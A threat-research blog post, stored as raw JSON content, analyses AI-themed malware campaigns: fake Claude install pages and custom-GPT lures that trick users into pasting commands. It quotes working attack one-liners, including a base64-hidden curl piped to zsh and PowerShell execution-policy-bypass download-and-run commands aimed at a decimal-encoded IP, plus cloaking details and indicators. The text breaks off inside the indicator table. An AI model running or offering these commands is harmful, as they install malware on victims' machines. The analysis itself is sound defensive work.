0-48zm-40-40l0 128 128 0 0-128-128 0zm88 208l0 48-48 0 0-48 48 0zm-48-40l-40 0 0 128 128 0 0-128-88 0zM400 64l48 0 0 48-48 0 0-48zM360 24l0 128 128 0 0-128-128 0zm88 208l0 48-48 0 0-48 48 0zm-48-40l-40 0 0 128 128 0 0-128-88 0zm0 208l48 0 0 48-48 0 0-48zm-40-40l0 128 128 0 0-128-128 0z",{"w":439,"h":420,"d":460},"M48 48l0 416 96 0 0-112 96 0 0 112 96 0 0-416-288 0zM0 0L384 0 384 512 0 512 0 0zM96 96l64 0 0 64-64 0 0-64zm192 0l0 64-64 0 0-64 64 0zM96 224l64 0 0 64-64 0 0-64zm192 0l0 64-64 0 0-64 64 0z",{"w":17,"h":420,"d":462},"M598.6 75.4L618 61.3 589.7 22.5C586 25.2 554.7 48 495.8 90.8l-34.1-22.7-6-4-145.2 0 0 0-144 0c-2.9 2.9-11.1 11.1-24.5 24.5-56.3-40.9-86.6-62.9-90.8-66.1L22.9 61.3c1.5 1.1 37.3 27.1 107.4 78.1l16.6 12.1c7.9-7.9 21.1-21.1 39.5-39.5l76.1 0-103 103-17 17c12.1 12.1 21.8 21.8 29.1 29.1 46.9 46.9 122.8 46.9 169.7 0L368.4 233.9 494.5 360c-16.7 16.7-29.4 29.4-38.1 38.1l-47-47-33.9 33.9 47 47-16 16-44.1 0-65-65-33.9 33.9 31 31-60.1 0-169-169-17-17-33.9 33.9 17 17 176 176 7 7 128 0 1 1 1-1 81.9 0 7-7c225.8-225.8 167.2-167.2 193-193l-33.9-33.9-64 64-143-143-17-17c-6.8 6.8-27.2 27.2-61.1 61.1-26.5 26.5-68.5 28-96.7 4.6l119.8-119.8 62.1 0 0 0 48.7 0c32.6 21.8 51.3 34.2 55.9 37.2l13.5-9.8 88-64z",{"w":425,"h":420,"d":464},"M352 96l224 0 0 224-48 0 0-142.1-191 191-17 17-17-17-111-111-139.8 139.8-17 17-33.9-33.9 17-17 156.8-156.8 17-17 17 17 111 111 174.1-174.1-142.1 0 0-48z",{"w":430,"h":420,"d":466},"M144 0l0 64 160 0 0-64 48 0 0 64 96 0 0 416-448 0 0-416 96 0 0-64 48 0zm0 112l-96 0 0 320 352 0 0-320-256 0zM261.6 228.2l84.1 12.2-60.9 59.3 14.4 83.8-75.2-39.6-75.2 39.6 14.4-83.8-60.9-59.3 84.1-12.2 37.6-76.2 37.6 76.2z",{"w":420,"h":420,"d":468},"M96 32l416 0 0 448-512 0 0-392 48 0 0 344 8 0c22.1 0 40-17.9 40-40L96 32zm38.4 400l329.6 0 0-352-320 0 0 312c0 14.4-3.5 28-9.6 40zM192 128l96 0 0 96-96 0 0-96zm152 48l72 0 0 48-96 0 0-48 24 0zM216 256l200 0 0 48-224 0 0-48 24 0zm0 80l200 0 0 48-224 0 0-48 24 0z",{"w":17,"h":420,"d":470},"M384 128a64 64 0 1 0 -128 0 64 64 0 1 0 128 0zm-176 0a112 112 0 1 1 224 0 112 112 0 1 1 -224 0zm252.8 76c5.9 2.6 12.4 4 19.2 4 26.5 0 48-21.5 48-48s-21.5-48-48-48l-.8 0c-1.6-16.6-5.8-32.4-12.1-47.1 4.2-.6 8.6-.9 12.9-.9 53 0 96 43 96 96s-43 96-96 96c-17.7 0-34.3-4.8-48.6-13.2 11.7-11.3 21.6-24.4 29.4-38.8zM208.6 242.8c-14.2 8.4-30.8 13.2-48.6 13.2-53 0-96-43-96-96s43-96 96-96c4.4 0 8.7 .3 12.9 .9-6.3 14.7-10.5 30.6-12.1 47.1l-.8 0c-26.5 0-48 21.5-48 48s21.5 48 48 48c6.8 0 13.3-1.4 19.2-4 7.8 14.4 17.7 27.5 29.4 38.8zM432 288l69.8 192-51.1 0-52.4-144-156.8 0-52.4 144-51.1 0 69.8-192 224 0zM151.2 304l-17.3 48-36.3 0-46.5 128-51.1 0 64-176 87.2 0zm354.8 48l-17.3-48 87.2 0 64 176-51.1 0-46.5-128-36.3 0z",{"w":425,"h":420,"d":472},"M144 354l-48 30 0-80-96 0 0-336 384 0 0 336-160 0-80 50zm0-56.6c43.5-27.2 65.6-41 66.2-41.4l125.8 0 0-240-288 0 0 240 96 0 0 41.4zM192 416l0-35.4 45.8-28.6 2.2 0 0 64 125.8 0c.6 .4 22.7 14.2 66.2 41.4l0-41.4 96 0 0-240-96 0 0-48 144 0 0 336-96 0 0 80-128-80-160 0 0-48zm0-340c-14.4 0-26.1 11.7-26.1 26.1l-40 0C125.9 65.6 155.5 36 192 36s66.1 29.6 66.1 66.1c0 29.7-17.7 46.9-33.3 55.6-4.5 2.5-8.9 4.8-12.9 6.2l-40 0 0-33.4c1.8-.2 3.6-.4 5.4-.6 9.7-1.1 19-2.1 27.9-7.1 7.5-4.2 12.9-10.1 12.9-20.8 0-14.4-11.7-26.1-26.1-26.1zM172 188l40 0 0 40-40 0 0-40z",{"id":474,"title":475,"authorsCollection":476,"content":486,"extension":1699,"faqItemsCollection":1700,"faqTitle":33,"featured":6,"hashTags":33,"meta":1702,"metaTitle":1703,"ogImage":33,"postType":1704,"publishedDate":1705,"relatedBlogPostsCollection":1706,"slug":1745,"stem":1746,"subtitle":33,"summary":1747,"synopsis":1757,"sys":1758,"tagsCollection":1761,"topicsCollection":1767,"__hash__":1814},"blog\u002Fblog\u002Fanalyzing-the-latest-ai-themed-malware-delivery-attacks.json","Analyzing the latest AI-themed malware delivery attacks",{"items":477},[478],{"fullName":479,"firstName":480,"jobTitle":481,"socialLinks":482,"profilePicture":484},"Dan Green","Dan","Threat Research",[483],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fdaniel-g-\u002F",{"url":485},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7jik1VhFgA3kgzXBXTm2Vw\u002Ffcd8c171da644903d0827eafcfbcaad0\u002FDan_Headshot_2025.png",{"json":487,"links":1554},{"data":488,"content":489,"nodeType":1553},{},[490,501,524,532,578,585,619,628,635,655,659,667,674,680,687,693,699,705,711,718,724,731,737,744,768,771,779,786,792,798,804,810,817,824,830,839,871,878,885,918,925,933,941,949,957,964,967,975,983,990,1009,1015,1023,1030,1037,1044,1051,1081,1100,1108,1115,1122,1128,1131,1139,1146,1169,1176,1179,1187,1194,1222,1230,1425,1433,1547],{"data":491,"content":492,"nodeType":500},{},[493],{"data":494,"marks":495,"value":498,"nodeType":499},{},[496],{"type":497},"bold","Attackers are using AI-themed lures to take advantage of AI adoption trends","text","heading-1",{"data":502,"content":503,"nodeType":523},{},[504,508,519],{"data":505,"marks":506,"value":507,"nodeType":499},{},[],"Employees are ",{"data":509,"content":511,"nodeType":518},{"uri":510},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhat-push-data-reveals-about-the-state-of-shadow-ai",[512],{"data":513,"marks":514,"value":517,"nodeType":499},{},[515],{"type":516},"underline","adopting AI tools","hyperlink",{"data":520,"marks":521,"value":522,"nodeType":499},{},[]," faster than security teams can approve them. Users search for a tool, find a download page or install guide, and follow the instructions. AI has also pushed developer-style workflows onto non-developers, with tools like Claude Code shipping as a terminal one-liner that a growing population of non-technical users now runs without a second thought.","paragraph",{"data":525,"content":526,"nodeType":523},{},[527],{"data":528,"marks":529,"value":531,"nodeType":499},{},[530],{"type":497},"Every one of those searches and installs is an opening for an attacker.",{"data":533,"content":534,"nodeType":523},{},[535,539,548,552,561,565,574],{"data":536,"marks":537,"value":538,"nodeType":499},{},[],"We’re tracking a cluster of AI-themed attacks that are an interesting development on the ",{"data":540,"content":542,"nodeType":518},{"uri":541},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finstallfix",[543],{"data":544,"marks":545,"value":547,"nodeType":499},{},[546],{"type":516},"InstallFix",{"data":549,"marks":550,"value":551,"nodeType":499},{},[]," and ",{"data":553,"content":555,"nodeType":518},{"uri":554},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign",[556],{"data":557,"marks":558,"value":560,"nodeType":499},{},[559],{"type":516},"LLMshare",{"data":562,"marks":563,"value":564,"nodeType":499},{},[]," techniques we reported against earlier this year. In our last quarterly snapshot, these attacks made up around 5% of all attacks we detected, making it a growing subset of our ClickFix detections that ",{"data":566,"content":568,"nodeType":518},{"uri":567},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-state-of-clickfix-by-detection-data",[569],{"data":570,"marks":571,"value":573,"nodeType":499},{},[572],{"type":516},"now make up more than half",{"data":575,"marks":576,"value":577,"nodeType":499},{},[]," of all Push’s detections on a monthly basis. And unlike ClickFix, victims in InstallFix scenarios are already expecting to install a tool via command line, not being ambushed by a fake CAPTCHA or page error that needs fixing.",{"data":579,"content":580,"nodeType":523},{},[581],{"data":582,"marks":583,"value":584,"nodeType":499},{},[],"The new attacks follow the same playbook:",{"data":586,"content":587,"nodeType":618},{},[588,603],{"data":589,"content":590,"nodeType":602},{},[591],{"data":592,"content":593,"nodeType":523},{},[594,598],{"data":595,"marks":596,"value":547,"nodeType":499},{},[597],{"type":497},{"data":599,"marks":600,"value":601,"nodeType":499},{},[],": lures that impersonate legitimate install pages for well-known and searched-for tools, like Claude Code, Codex, and many more (including tools like NotebookLM that don’t actually have a thick client option…). The attacker simply replaces the install command with a malicious one that results in malware.","list-item",{"data":604,"content":605,"nodeType":602},{},[606],{"data":607,"content":608,"nodeType":523},{},[609,614],{"data":610,"marks":611,"value":613,"nodeType":499},{},[612],{"type":497},"LLMshare: ",{"data":615,"marks":616,"value":617,"nodeType":499},{},[],"Using shared chats and artifacts on popular LLMs like Claude, ChatGPT, and increasingly custom GPTs. The attacker houses a malicious link in the shared artifact, which serves a separate page where the payload is delivered — typically a file download or ClickFix-style prompt. ","unordered-list",{"data":620,"content":626,"nodeType":627},{"target":621},{"sys":622},{"id":623,"type":624,"linkType":625},"54y6TNPac34FNsyElUb2G","Link","Entry",[],"embedded-entry-block",{"data":629,"content":630,"nodeType":523},{},[631],{"data":632,"marks":633,"value":634,"nodeType":499},{},[],"Like other web-based attacks, attackers use lots of different detection evasion techniques to slip under the radar. Blending in with legitimate sites, abusing redirects and bot protection tools, cloning real pages, and many more. ",{"data":636,"content":637,"nodeType":523},{},[638,642,651],{"data":639,"marks":640,"value":641,"nodeType":499},{},[],"The payload execution method itself is also highly effective. Most of the time, these attacks result in fileless malware delivery, with a growing toolkit of legitimate binaries and command forms running on legitimate execution surfaces, and initiated by the user. It’s no surprise that ",{"data":643,"content":645,"nodeType":518},{"uri":644},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fsecurity-insider\u002Fthreat-landscape\u002F2026-digital-defense-report",[646],{"data":647,"marks":648,"value":650,"nodeType":499},{},[649],{"type":516},"Microsoft is seeing",{"data":652,"marks":653,"value":654,"nodeType":499},{},[]," a 96.3% success rate in ClickFix attacks converting to malware delivery. ",{"data":656,"content":657,"nodeType":658},{},[],"hr",{"data":660,"content":661,"nodeType":500},{},[662],{"data":663,"marks":664,"value":666,"nodeType":499},{},[665],{"type":497},"Cluster 1: InstallFix",{"data":668,"content":669,"nodeType":523},{},[670],{"data":671,"marks":672,"value":673,"nodeType":499},{},[],"The victim is served a malvertised link when searching “claude mac” on Google Search. Clicking the link serves up a fake “Download Claude” page hosted on claude-desk-code[.]com. Interestingly, the sponsored result shows “bing[.]com” as the link, with the attacker using Bing as another redirect to mask the fake domain.",{"data":675,"content":679,"nodeType":627},{"target":676},{"sys":677},{"id":678,"type":624,"linkType":625},"1VqTWgUFyLKYkEV5da2aLx",[],{"data":681,"content":682,"nodeType":523},{},[683],{"data":684,"marks":685,"value":686,"nodeType":499},{},[],"It passes the visitor through Google's ad redirect to a Bing click-tracking link (bing.com\u002Fck\u002Fa), which forwards the browser to the \"about us\" page of a legitimate South American homeopathy retailer, homeopatiaalemana[.]com. That site appears to have been compromised: visitors arriving through this chain get a 302 to claude-desk-code[.]com. ",{"data":688,"content":692,"nodeType":627},{"target":689},{"sys":690},{"id":691,"type":624,"linkType":625},"2DQwKryRXN4jYuDxpmAVWH",[],{"data":694,"content":698,"nodeType":627},{"target":695},{"sys":696},{"id":697,"type":624,"linkType":625},"76D4JVE0tYvkQ6ucvb4LtA",[],{"data":700,"content":704,"nodeType":627},{"target":701},{"sys":702},{"id":703,"type":624,"linkType":625},"6EnpPTVEYMHutq5qfTzhSH",[],{"data":706,"content":710,"nodeType":627},{"target":707},{"sys":708},{"id":709,"type":624,"linkType":625},"4RHb8PjtFNWkgTVCd13EfQ",[],{"data":712,"content":713,"nodeType":523},{},[714],{"data":715,"marks":716,"value":717,"nodeType":499},{},[],"Clicking the download button serves up a nicely branded and authentic looking lure that will be familiar to anyone that has seen ClickFix attacks. However, in this case the install command is being further masked. Instead of presenting the malicious command to the user, the rendered visual is of the real Claude install command, but with the malicious command copied to clipboard. ",{"data":719,"content":723,"nodeType":627},{"target":720},{"sys":721},{"id":722,"type":624,"linkType":625},"4gyUkIOqUGFkUJJK70mchp",[],{"data":725,"content":726,"nodeType":523},{},[727],{"data":728,"marks":729,"value":730,"nodeType":499},{},[],"You can see the full chain here: ",{"data":732,"content":736,"nodeType":627},{"target":733},{"sys":734},{"id":735,"type":624,"linkType":625},"mMdzp4asCApMrjIQfYWPk",[],{"data":738,"content":739,"nodeType":523},{},[740],{"data":741,"marks":742,"value":743,"nodeType":499},{},[],"The command targets macOS users. The paste command starts with an echo that prints \"Downloading Claude: https:\u002F\u002Fclaude.ai\u002Finstall.sh\" in the Terminal, so the output looks like the official installer. The real download comes after the &&, where curl fetches from a URL stored as base64 and decoded at run time with openssl base64 -d -A, so lake-90[.]com never appears in plain text. The downloaded .dat file is piped straight into zsh without being saved to disk. This means that a victim who checks the page and then watches the Terminal sees a legitimate Claude URL both times.",{"data":745,"content":746,"nodeType":523},{},[747,753,757,764],{"data":748,"marks":749,"value":752,"nodeType":499},{},[750],{"type":751},"code","echo \"Downloading Claude: hxxps:\u002F\u002Fclaude[.]ai\u002Finstall.sh\" && curl -s $(echo \"aHR0cHM6Ly9sYWtlLTkwLmNvbS9jdXJsL2luaGd1cDlhL2E5MGZrYnFkZzhkMG11czY0b2g4ZHcuZGF0\" | openssl base64 -d -A) | zsh\n",{"data":754,"marks":755,"value":756,"nodeType":499},{},[],"\nWe’ve identified several domains linked to the same ",{"data":758,"content":759,"nodeType":518},{"uri":567},[760],{"data":761,"marks":762,"value":763,"nodeType":499},{},[],"criminal ClickFix toolkit",{"data":765,"marks":766,"value":767,"nodeType":499},{},[]," which we track internally as AcSig (based on the headers that it requires be sent with an HMAC in order to fetch the malicious command) all using an identical macOS command, the same payload URL shape, and the same install modal code. You can find the list of IoCs at the end. ",{"data":769,"content":770,"nodeType":658},{},[],{"data":772,"content":773,"nodeType":500},{},[774],{"data":775,"marks":776,"value":778,"nodeType":499},{},[777],{"type":497},"Cluster 2: LLMshare",{"data":780,"content":781,"nodeType":523},{},[782],{"data":783,"marks":784,"value":785,"nodeType":499},{},[],"This cluster uses a similar overall pattern of malvertising to ClickFix payload, but uses shared Custom GPTs rather than a fake\u002Fcloned install page. ",{"data":787,"content":791,"nodeType":627},{"target":788},{"sys":789},{"id":790,"type":624,"linkType":625},"24HC8GnGke7QUXgC3qTfnl",[],{"data":793,"content":797,"nodeType":627},{"target":794},{"sys":795},{"id":796,"type":624,"linkType":625},"2TI1XEO0RdaEAOHnSGOl7P",[],{"data":799,"content":803,"nodeType":627},{"target":800},{"sys":801},{"id":802,"type":624,"linkType":625},"73NPD3j2Uo69EIv0CtvROZ",[],{"data":805,"content":809,"nodeType":627},{"target":806},{"sys":807},{"id":808,"type":624,"linkType":625},"6ec7c2M1oTRKSdQyYPaV2p",[],{"data":811,"content":812,"nodeType":523},{},[813],{"data":814,"marks":815,"value":816,"nodeType":499},{},[],"Hosting on sites.google[.]com is a common tactic we see to blend in with legitimate sites, and is one of many that are commonly abused by attackers. ",{"data":818,"content":819,"nodeType":523},{},[820],{"data":821,"marks":822,"value":823,"nodeType":499},{},[],"You can see the attack below. ",{"data":825,"content":829,"nodeType":627},{"target":826},{"sys":827},{"id":828,"type":624,"linkType":625},"4bc7Q0qFBlgMddzugltRdz",[],{"data":831,"content":832,"nodeType":838},{},[833],{"data":834,"marks":835,"value":837,"nodeType":499},{},[836],{"type":497},"Links to previously reported campaigns","heading-2",{"data":840,"content":841,"nodeType":523},{},[842,846,855,858,867],{"data":843,"marks":844,"value":845,"nodeType":499},{},[],"This looks to be a continuation of the attacks reported by ",{"data":847,"content":849,"nodeType":518},{"uri":848},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fchatgpt-custom-gpts-clickfix-rat",[850],{"data":851,"marks":852,"value":854,"nodeType":499},{},[853],{"type":516},"Huntress",{"data":856,"marks":857,"value":551,"nodeType":499},{},[],{"data":859,"content":861,"nodeType":518},{"uri":860},"https:\u002F\u002Fwww.island.io\u002Fblog\u002Fhow-attackers-use-sponsored-search-custom-gpts-in-malware-delivery",[862],{"data":863,"marks":864,"value":866,"nodeType":499},{},[865],{"type":516},"Island",{"data":868,"marks":869,"value":870,"nodeType":499},{},[],", which they correlate with 850 paid ads, 71 Google Ads campaign IDs, and 26 different custom GPT pages, with a range of lures including the “Service Availability Notice” we detected, and an older \"high traffic, use our backup domain\" message. ",{"data":872,"content":873,"nodeType":523},{},[874],{"data":875,"marks":876,"value":877,"nodeType":499},{},[],"The campaign involves various payloads too: Huntress's chain ends in a custom RAT using a fake .wav file and finds its control server over DNS-over-HTTPS. Island saw NetSupport RAT delivered inside an MP4 file instead.",{"data":879,"content":880,"nodeType":523},{},[881],{"data":882,"marks":883,"value":884,"nodeType":499},{},[],"The most recent attacks (including the ones we’ve detected) all use the same antibot naming convention in the sites.google[.]com url path used to serve up the ClickFix payload:",{"data":886,"content":887,"nodeType":618},{},[888,898,908],{"data":889,"content":890,"nodeType":602},{},[891],{"data":892,"content":893,"nodeType":523},{},[894],{"data":895,"marks":896,"value":897,"nodeType":499},{},[],"sites[.]google[.]com\u002Fview\u002Fantibot-837116\u002Fchatgpt",{"data":899,"content":900,"nodeType":602},{},[901],{"data":902,"content":903,"nodeType":523},{},[904],{"data":905,"marks":906,"value":907,"nodeType":499},{},[],"sites[.]google[.]com\u002Fview\u002Fantibot172881",{"data":909,"content":910,"nodeType":602},{},[911],{"data":912,"content":913,"nodeType":523},{},[914],{"data":915,"marks":916,"value":917,"nodeType":499},{},[],"sites[.]google[.]com\u002Fview\u002Fantibot829011",{"data":919,"content":920,"nodeType":523},{},[921],{"data":922,"marks":923,"value":924,"nodeType":499},{},[],"There’s also a common command form between what was reported by Huntress and what we’ve identified:",{"data":926,"content":927,"nodeType":523},{},[928],{"data":929,"marks":930,"value":932,"nodeType":499},{},[931],{"type":497},"Huntress:",{"data":934,"content":935,"nodeType":523},{},[936],{"data":937,"marks":938,"value":940,"nodeType":499},{},[939],{"type":751},"\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -ExecutionPolicy Bypass \"irm 1614733393[\u002F]12 | Out-File $env:temp\\1777.ps1;& $env:temp\\1777.ps1\"",{"data":942,"content":943,"nodeType":523},{},[944],{"data":945,"marks":946,"value":948,"nodeType":499},{},[947],{"type":497},"Push:",{"data":950,"content":951,"nodeType":523},{},[952],{"data":953,"marks":954,"value":956,"nodeType":499},{},[955],{"type":751},"powershell -ExecutionPolicy Bypass \"irm 2549127135[\u002F]151 -OutFile $env:temp\\151.ps1;& $env:temp\\151.ps1\"",{"data":958,"content":959,"nodeType":523},{},[960],{"data":961,"marks":962,"value":963,"nodeType":499},{},[],"The victim pastes the command into the Windows Run dialog, which starts PowerShell with the execution policy turned off for that session, then uses irm (Invoke-RestMethod) to download a script over plain HTTP from 2549127135, which is the IP address 151.240.151[.]223 written using decimal encoding so it gets past filters looking for dotted IPs and doesn't look like a web address to the victim. The script is saved to the temp folder as 151.ps1 and runs straight away. In Huntress's write-up, the next stage installed a malicious MSI that sideloads a RAT through a legitimately signed app.",{"data":965,"content":966,"nodeType":658},{},[],{"data":968,"content":969,"nodeType":500},{},[970],{"data":971,"marks":972,"value":974,"nodeType":499},{},[973],{"type":497},"Tradecraft analysis",{"data":976,"content":977,"nodeType":838},{},[978],{"data":979,"marks":980,"value":982,"nodeType":499},{},[981],{"type":497},"Visual obfuscation of the ClickFix command",{"data":984,"content":985,"nodeType":523},{},[986],{"data":987,"marks":988,"value":989,"nodeType":499},{},[],"Cluster 1 used a sneaky visual deception with a legitimate command presented to the user but a malicious one copied behind the scenes. As well as being a clever way to trick the user, any checks that rely on reading the text on the screen itself will probably fall foul of this technique.",{"data":991,"content":992,"nodeType":523},{},[993,997,1005],{"data":994,"marks":995,"value":996,"nodeType":499},{},[],"We’re seeing this trick used elsewhere and it's likely that it will become increasingly common given the way that ",{"data":998,"content":999,"nodeType":518},{"uri":567},[1000],{"data":1001,"marks":1002,"value":1004,"nodeType":499},{},[1003],{"type":516},"ClickFix tools",{"data":1006,"marks":1007,"value":1008,"nodeType":499},{},[]," tend to emulate one another and disseminate new tricks across the criminal marketplace. ",{"data":1010,"content":1014,"nodeType":627},{"target":1011},{"sys":1012},{"id":1013,"type":624,"linkType":625},"5EVzRXoYw68PGdJANAaQ8q",[],{"data":1016,"content":1017,"nodeType":838},{},[1018],{"data":1019,"marks":1020,"value":1022,"nodeType":499},{},[1021],{"type":497},"Bing as a redirect — on Google Search",{"data":1024,"content":1025,"nodeType":523},{},[1026],{"data":1027,"marks":1028,"value":1029,"nodeType":499},{},[],"bing.com\u002Fck\u002Fa is the redirect Bing puts behind every result on its own search pages, so it can log clicks before sending people on. The destination is base64-encoded in the u parameter, after an a1 prefix, and Bing forwards the visitor with a short JavaScript page rather than an HTTP redirect. That's why the request shows a 200 rather than a 302, and why the browser reaches the next hop carrying a bing.com referrer. The link in this campaign also contains a timestamp that decodes to October 5, 2026, which is probably when Bing generated it.",{"data":1031,"content":1032,"nodeType":523},{},[1033],{"data":1034,"marks":1035,"value":1036,"nodeType":499},{},[],"Our working theory is that the attacker has most likely taken a legitimate Bing search result for a page they’ve compromised and used that in the malvertised Google Search ad. ",{"data":1038,"content":1039,"nodeType":523},{},[1040],{"data":1041,"marks":1042,"value":1043,"nodeType":499},{},[],"There are two layers of cloaking that limit the payload delivery and attempt to cloak it from unwanted visitors. The compromised site has a server-side check via 302 that requires a Bing referrer and certain browser headers. Then, the fake Claude site has a separate check via JavaScript that reads document.referrer, and anything not containing Google or Bing. goes to \u002F404.html (meaning visiting the URL directly results in the 404). ",{"data":1045,"content":1046,"nodeType":523},{},[1047],{"data":1048,"marks":1049,"value":1050,"nodeType":499},{},[],"Interestingly, visiting the compromised site from Bing also serves the malicious page. This probably isn’t intended functionality, but shows the primary target is Google Search users, not Bing users.",{"data":1052,"content":1053,"nodeType":523},{},[1054,1058,1066,1069,1077],{"data":1055,"marks":1056,"value":1057,"nodeType":499},{},[],"Bing's click-tracking redirect has turned up before as well, in ",{"data":1059,"content":1061,"nodeType":518},{"uri":1060},"https:\u002F\u002Fwww.trustwave.com\u002Fen-us\u002Fresources\u002Fblogs\u002Fspiderlabs-blog\u002Ftrusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks\u002F",[1062],{"data":1063,"marks":1064,"value":1065,"nodeType":499},{},[],"phishing emails",{"data":1067,"marks":1068,"value":551,"nodeType":499},{},[],{"data":1070,"content":1072,"nodeType":518},{"uri":1071},"https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fnovel-phishing-qr-codes-bing-url-microsoft-security",[1073],{"data":1074,"marks":1075,"value":1076,"nodeType":499},{},[],"QR codes",{"data":1078,"marks":1079,"value":1080,"nodeType":499},{},[],". But we hadn't seen it used as the destination of a search ad, and found no prior public reporting of that. It makes sense though. Rather than showing a suspicious URL, the ad shows bing.com as its domain, Google's review and URL-reputation checks see a Bing link, and the hidden destination is a compromised retailer site rather than the lure itself. ",{"data":1082,"content":1083,"nodeType":523},{},[1084,1088,1096],{"data":1085,"marks":1086,"value":1087,"nodeType":499},{},[],"You can read our ",{"data":1089,"content":1091,"nodeType":518},{"uri":1090},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fadception-malvertising-another-search-engines-search-results",[1092],{"data":1093,"marks":1094,"value":1095,"nodeType":499},{},[],"full write-up of this technique here",{"data":1097,"marks":1098,"value":1099,"nodeType":499},{},[],". ",{"data":1101,"content":1102,"nodeType":838},{},[1103],{"data":1104,"marks":1105,"value":1107,"nodeType":499},{},[1106],{"type":497},"Abuse of custom GPTs",{"data":1109,"content":1110,"nodeType":523},{},[1111],{"data":1112,"marks":1113,"value":1114,"nodeType":499},{},[],"It’s also worth pointing out the advantages of using a custom GPT over a typical shared chat — the main point being that it more closely resembles the intended user experience. You have to interact with the GPT normally to be served the instructions\u002Flink. ",{"data":1116,"content":1117,"nodeType":523},{},[1118],{"data":1119,"marks":1120,"value":1121,"nodeType":499},{},[],"This is similar to how we’ve seen ClickFix injected into other things, like the example below that shows how a ClickFix lure is served up when using a cloned background remover tool, but only after you’ve uploaded your media and the process has started. There’s a sunk cost and, as far as you can see, everything was expected up until the point that the ClickFix was served up. So, it’s not surprising to see custom GPT abuse trending up. ",{"data":1123,"content":1127,"nodeType":627},{"target":1124},{"sys":1125},{"id":1126,"type":624,"linkType":625},"5yoLmqysyQazfzLITCUTfc",[],{"data":1129,"content":1130,"nodeType":658},{},[],{"data":1132,"content":1133,"nodeType":500},{},[1134],{"data":1135,"marks":1136,"value":1138,"nodeType":499},{},[1137],{"type":497},"How Push can help",{"data":1140,"content":1141,"nodeType":523},{},[1142],{"data":1143,"marks":1144,"value":1145,"nodeType":499},{},[],"Push detects ClickFix attacks inside the browser before the payload reaches the endpoint. ",{"data":1147,"content":1148,"nodeType":618},{},[1149,1159],{"data":1150,"content":1151,"nodeType":602},{},[1152],{"data":1153,"content":1154,"nodeType":523},{},[1155],{"data":1156,"marks":1157,"value":1158,"nodeType":499},{},[],"Real-time page analysis identifies ClickFix kits on page load from their page structure and script behavior, independent of the attacker's infrastructure. ",{"data":1160,"content":1161,"nodeType":602},{},[1162],{"data":1163,"content":1164,"nodeType":523},{},[1165],{"data":1166,"marks":1167,"value":1168,"nodeType":499},{},[],"Malicious copy and paste detection fires on the clipboard event itself, catching the payload regardless of which LOLBin it invokes or how it's obfuscated — and covering every xFix derivative. ",{"data":1170,"content":1171,"nodeType":523},{},[1172],{"data":1173,"marks":1174,"value":1175,"nodeType":499},{},[],"Because Push operates at the browser layer, it intercepts ClickFix regardless of delivery mechanism, tackling attacks that arrive via search engines and compromised sites rather than email. This adds a powerful layer of protection in the browser that works alongside endpoint-layer controls, and is a flexible way of extending protection to machines that lack endpoint security controls such as BYOD devices, contractor machines, Macs, and developer machines.",{"data":1177,"content":1178,"nodeType":658},{},[],{"data":1180,"content":1181,"nodeType":500},{},[1182],{"data":1183,"marks":1184,"value":1186,"nodeType":499},{},[1185],{"type":497},"IoCs",{"data":1188,"content":1189,"nodeType":523},{},[1190],{"data":1191,"marks":1192,"value":1193,"nodeType":499},{},[],"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to quickly spin up and rotate the sites used in the attack chain. IoC-based detections for campaigns like this are of limited value.",{"data":1195,"content":1196,"nodeType":523},{},[1197,1201,1208,1211,1218],{"data":1198,"marks":1199,"value":1200,"nodeType":499},{},[],"At the time of writing, the indicators observed by Push are listed below. See the ",{"data":1202,"content":1203,"nodeType":518},{"uri":860},[1204],{"data":1205,"marks":1206,"value":866,"nodeType":499},{},[1207],{"type":516},{"data":1209,"marks":1210,"value":551,"nodeType":499},{},[],{"data":1212,"content":1213,"nodeType":518},{"uri":848},[1214],{"data":1215,"marks":1216,"value":854,"nodeType":499},{},[1217],{"type":516},{"data":1219,"marks":1220,"value":1221,"nodeType":499},{},[]," write-ups for more (Huntress delves into the malware analysis side in detail).",{"data":1223,"content":1224,"nodeType":838},{},[1225],{"data":1226,"marks":1227,"value":1229,"nodeType":499},{},[1228],{"type":497},"Cluster 1",{"data":1231,"content":1232,"nodeType":1424},{},[1233,1260,1283,1355,1378,1401],{"data":1234,"content":1235,"nodeType":1259},{},[1236,1248],{"data":1237,"content":1238,"nodeType":1247},{},[1239],{"data":1240,"content":1241,"nodeType":523},{},[1242],{"data":1243,"marks":1244,"value":1246,"nodeType":499},{},[1245],{"type":497},"Type","table-cell",{"data":1249,"content":1250,"nodeType":1247},{},[1251],{"data":1252,"content":1253,"nodeType":523},{},[1254],{"data":1255,"marks":1256,"value":1258,"nodeType":499},{},[1257],{"type":497},"Indicator","table-row",{"data":1261,"content":1262,"nodeType":1259},{},[1263,1273],{"data":1264,"content":1265,"nodeType":1247},{},[1266],{"data":1267,"content":1268,"nodeType":523},{},[1269],{"data":1270,"marks":1271,"value":1272,"nodeType":499},{},[],"Google ad campaign 